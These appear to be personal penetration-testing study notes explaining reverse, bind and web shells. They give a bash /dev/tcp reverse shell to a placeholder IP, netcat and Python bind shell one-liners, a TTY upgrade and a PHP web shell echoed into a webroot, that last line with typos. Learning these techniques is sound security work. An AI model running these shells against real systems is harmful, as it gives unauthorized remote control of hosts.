# Type of Shells

# Type of Shells

~~To Enumerate the system or take further control or connection with networks , we need a reliable connection that give us direct access to the system’s shell that is Bash,or powershell~~

[Untitled](Type%20of%20Shells%20ed04c2598f054e4f964134780eb5d5b7/Untitled%20Database%2096d8cedf917549689d02e77b8bde0b6a.csv)

The detailed version of [[Connecting to Vpn]] shells.

---

###### Reverse Shell

---

|| –|–|– | Remote Code Execution | netcat listener with a specific port

---

###### Netcat Listner

---

The first step is to start a  listener on a port of our Choosing :

---

Usage :

---

|| –|–| |   | Listen mode , to wait for connection to wait for us.  | Verbose mode, so that we know when we receive a connection.  | Disable Dns resolution and only connect from/to IPs, to speed up the connection.  | Port number netcat is listening on, and the reverse connection should be should be sent to.

---

### Reverse Shell Commands

The commands we execute depends on what the os host runs.

**#Tools – [Payload all things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)** This page has a comprehensive list of reverse shell commands.

Use this command to get reverse connection for **bash** on **Linux**

```
bash -c 'bash -i >& /dev/TCP/10.10.10.10/1234 0>&1'
```

### Bind Shell Command

Once we execute a Bind shell command It will start listening on a port on the remote host and bind that host’s shell to that port. We have to connect through that port with netcat and we will get control shell on that system.

This command is used for starting a bind shell :

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
```

```
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

### Netcat Connection

Once we execute bind shell command, we should have a shell waiting for us on the specified port. We can now connect to it.

### UPGRADING TTY

~~What is **TTY** TTY stands for **Teletypewriter**. It’s prints name of terminal you’re using.~~

~~Why we can use **TTY** When we successfully connected to netcat shell we saw only **typing commands or backspace** works nothing else. We can’t move left or right then we have have upgrade **TTY** to able to do that. There are multiple methods to do that but here is **python/stty**~~

This upgrades **TTY**

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

After we run this command we will hit **ctl+z** to background our shell and input the following `stty` command `~~stty` stands for set TTY~~  [[Pasted image 20210911202557.png]]

**fg** to bring back our netcat and hit **enter** and **reset** and hit enter . At this point we would have fully TTY with command history and everything else .

We may notice that our shell does not cover the entire terminal. To fix this we have to figure out a few variables , we have to open a new terminal.

[[Pasted image 20210911203811.png]]

**Go back and use the commands to netcat shell**

[[Pasted image 20210911203953.png]]

### Web Shell

A **Web Shell** is typically a web script that is **PHP** or **ASPX** that accepts our commands through HTTP request Parameters such as **GET**/**POST** request parameters, executes our commands and prints its output back on the web page. `~~ASPX` – Active Server Pages extended. Microsofts’s first server side scripting language and engine for dynamic web.~~

### Writing a Web Page

~~Web shell is a malicious script that provides an attacker with a convenient way to launch attacks using a compromised web-server~~ First of all we need to write our web shell that would take our command through a **GET** request,executes it and print it output back. It’s one liner that is very short.

[[Pasted image 20210911205550.png]]

### Uploading a web shell

If we have web shell we have to upload it on remote host’s web directory(web root) to execute the script through web browser. This can be through our a vulnerability in an upload feature, which would allow us to write one of our shells to file i.e. shell.php and upload it and then access our uploaded file to execute commands.

if we have only RCE through an exploit , we can write our shell directly to the webroot to access it over the web. Where is webroot default webroot for common web server :

[[Pasted image 20210911210643.png]]

We can check these directories to see which webroot is in use and then use **echo** to write out our web shell.

For example if we are attacking a linux host running apache we can write a PHP shell

`echo "<?PHP sytem($_GET['cmd'];?>)" > /var/www/html/shell.php`

### Accessing web shell

`http://SERVER_IP:PORT\shell.php?cmd=id`

[[Pasted image 20210911221750.png]]